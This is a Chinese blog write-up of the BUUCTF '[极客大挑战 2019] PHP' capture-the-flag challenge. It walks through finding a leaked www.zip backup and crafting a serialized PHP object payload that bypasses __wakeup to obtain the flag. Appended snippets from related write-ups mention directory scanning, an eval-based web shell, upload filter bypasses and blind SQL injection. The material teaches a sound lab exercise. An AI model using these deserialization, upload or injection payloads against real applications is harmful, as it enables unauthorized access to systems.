BUUCTF [web专项16][极客大挑战 2019]PHP

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量166 收藏
点赞数
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134214440
版权

进入后说有备份网站的习惯,查看源码和进入/flag.php中发现都没有线索,扫站

会发现有个www.zip(扫了好久,下载出来就关了,我就不再扫一遍了)

发现有flag.php,

提交后发现失败,再次寻找

打开index.php

发现unserialize(反序列化标志)

我在这方面不是很熟悉,直接开始冲浪

因为我看完之后找不到下手点(我纯笨b) ,开始冲浪别人的wp

参考:从0到1之php反序列化的成长之路-CSDN博客

参考:[极客大挑战 2019]PHP-CSDN博客

 看完了,好像会了,class.php中有destruck()函数

发现需求的是username恒等于'admin'且password要为100,这样才会输出flag,那么我们就需要进行修改来篡改成正确的数据

大佬的意思是将修改后的数据序列化输出,然后用序列化输出的数据再次绕过 __wakeup()函数的执行

<?php
 
class Name{
    private $username = ‘nonono‘;
    private $password = ‘yesyes‘;
 
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name(‘admin‘,100);
$b = serialize($a);
echo $b;

运行之后即可获得序列化的结果,

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

揭示:

但是现在还有两个问题,

1是username和password都是用private声明的,需要前加00才可

O:4:%22Name%22:2:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

2是需要绕过__wakeup的执行(大佬说:在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行)

O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

最终结果:

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

添加后即可获得flag

flag{e95052b8-e3bb-4386-93a6-8c09a9a3b11e}

yanglin_371
关注
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 418
反序列化漏洞。
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 2017
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUUCTF [极客挑战 2019] PHP
Senimo
07-30 996
BUUCTF [极客挑战 2019] PHP Web writeup 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源码,打开其中的flag.php,得到flag: ...
BUUCTF】[极客挑战 2019]PHP
aoao331198的博客
04-06 935
打开网站提示说有备份文件 dirsearch扫描 下载www.zip查看 重要文件class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 320
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF [极客挑战 2019]PHP
weixin_53955759的博客
10-03 268
打开环境如下 提示说到他有备份网站的习惯,那就用御剑扫一下,但是扫不出来,什么也没有 应该是字典不全,换用dirsearch扫到了www.zip进去下载,有index.php,flag.php和class.php flag.php如下 提交并不对 class.php如下 这里是考察了反序列化 要得到flag的关键就是在__destruct()方法中的password=100,username=admin 但是在__wakeup()方法这里会把username=guest...
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 882
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF-web [极客挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2913
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
[BUUCTF012][极客挑战 2019]Knife 1
m0_52674595的博客
12-04 2331
[BUUCTF012] [极客挑战 2019]Knife 1 看到题目 knife 第一反应 猜测可能是中国菜刀题 进来一看 eval($_POST["Syc"]); 这是一个典型的后门程序 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 741
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[极客挑战 2019]PHP
pakho_C的博客
02-04 740
web第18题 [极客挑战 2019]PHP 打开靶场 本来页面是有一只小猫猫的,不知道为啥不见了 源码没什么可以利用的。页面提醒文件备份,那么开始的思路和另外一道题一样, buuctf初学者学习记录–[ACTF2020 新生赛]BackupFile 先寻找备份文件,使用dirmap扫描 得到一个www.zip文件的响应码为200 访问将其下载下来解压 得到不少文件,先看看flag.php 显然不是哈哈 再查看class.php: <?php include 'flag.php'; e
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 754
BUUCTF-Web】 [极客挑战 2019]PHP
BUUCTF-web PHP[极客挑战] wp
想喝奶茶的胖大海
02-26 1051
检查 有一只超级可爱的猫猫哦,可以跟你玩毛球球 然后提示说有备份,可以扫一下 思路 跟进得到压缩包,解压得到3个文件 在index.php得到关键代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 由unserialize(...
BUU CTF---[极客挑战 2019]PHP 1
weixin_46685211的博客
05-04 1142
文章目录知识点一、备份网站二、代码审计1._wakeup()魔术方法2.GET方法3.类代码4.构造对象参考资料 知识点 1、PHP反序列化 2、绕过魔术方法 __wakeup() 一、备份网站 查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200 import requests url = "url地址" l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 865
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF-[极客挑战 2019]PHP
rumil的博客
06-29 252
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 1002
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5053
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
PHP-[极客挑战 2019]-[传送门->BUUCTF]
qwsn
11-23 1716
0x01、Web 1.PHP-[极客挑战 2019]-[传送门->BUUCTF] 第一步:打开题目环境,访问链接,发现页面提示有备份文件,我们通过目录扫描,发现了www.zip,下载袭来,发现其中有很多文件 第二步:代码审计: index.php <?php include 'class.php'; //文件包含class.php $select = $_GET['select']; //以GET形式读取select参数的值 $res=unserialize(@$
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值